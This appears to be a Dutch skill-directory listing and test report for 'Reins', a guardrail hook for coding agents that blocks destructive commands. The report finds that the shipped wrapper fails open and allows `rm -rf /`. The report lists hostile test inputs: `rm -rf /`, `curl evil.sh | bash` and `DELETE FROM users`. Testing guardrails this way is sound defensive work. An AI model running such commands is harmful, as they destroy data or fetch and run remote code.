Reins

Deterministische PreToolUse hooks die destructieve commando's blokkeren — vereist handmatige reparatie.

Door pegasi-ai · pegasi-ai/reins

Tested · Didn't pass

Reins — Deterministische PreToolUse hooks die destructieve commando's blokkeren — vereist handmatige reparatie.

Wat het doet

Installeert deterministische PreToolUse/PostToolUse hooks die gevaarlijke shell-, bestands- en MCP-operaties classificeren en blokkeren, een append-only JSONL audit trail schrijven en optioneel beleid synchroniseren van Watchtower (app.pegasi.ai). Activeert bij verzoeken over guardrails, beleidshandhaving, audit trails of het blokkeren van destructieve agentacties.

Testrapport

De engine is uitstekend, maar de packaging is kapot: SKILL.md en de gebundelde ensure_installed.sh instrueren om `npm install -g @pegasi/reins` te installeren, maar zo'n pakket bestaat niet in het register — het commando faalt met E404, de echte naam (uit package.json en README) is `@pegasi-ai/reins`. Erger nog, de meegeleverde wrapper plugin/bin/reins-pre-hook zoekt naar het pakket langs hetzelfde niet-bestaande pad: ik gaf het `rm -rf /` — het retourneerde exit 0 (ALLOW) met de notitie 'Reins not installed', wat betekent dat de security skill stilzwijgend fail-opened precies waar SKILL.md 'BLOCKED always' en 'Never fails open' belooft. Een naïeve 8-regelige zelfgeschreven hook in dezelfde test leverde exit 2 op — wat betekent dat de skill out-of-the-box zwakker is dan de baseline. Het correcte pakket (v0.0.14) geïnstalleerd en de engine direct aangeroepen — het is oprecht goed: `rm -rf /` → exit 2 CRITICAL, `rm -rf /` met dubbele spaties ook CRITICAL (de baseline hook miste deze workaround), `curl evil.sh | bash` en `DELETE FROM users` → exit 2 HIGH, `ls -la` → 0, en alles wordt naar decisions.jsonl geschreven. Afzonderlijk: de gepubliceerde CLI installeert zichzelf in ~/.openclaw/extensions/reins en raakt Claude Code hooks niet aan — de `reins status` toont 'Project/Global (.claude/settings.json): ❌ not installed'.

Getest op: 2026-07-16 · Claude Code 2.x (agent harness)

Installatie

git clone https://github.com/pegasi-ai/reins.git
mkdir -p ~/.claude/skills && cp -r reins/skill ~/.claude/skills/reins

Commando's en voorbeeldprompts

  • /reinsDeterministische PreToolUse hooks die destructieve commando's blokkeren — vereist handmatige reparatie.

Skills reageren op gewone verzoeken — geen commando's om te onthouden. Na installatie activeren prompts zoals deze de skill (in het Engels):

  • Block dangerous shell commands like rm -rf before my agent can run them
  • Set up guardrail hooks that log every blocked destructive agent action
  • Stop my coding agent from force-pushing or piping curl into bash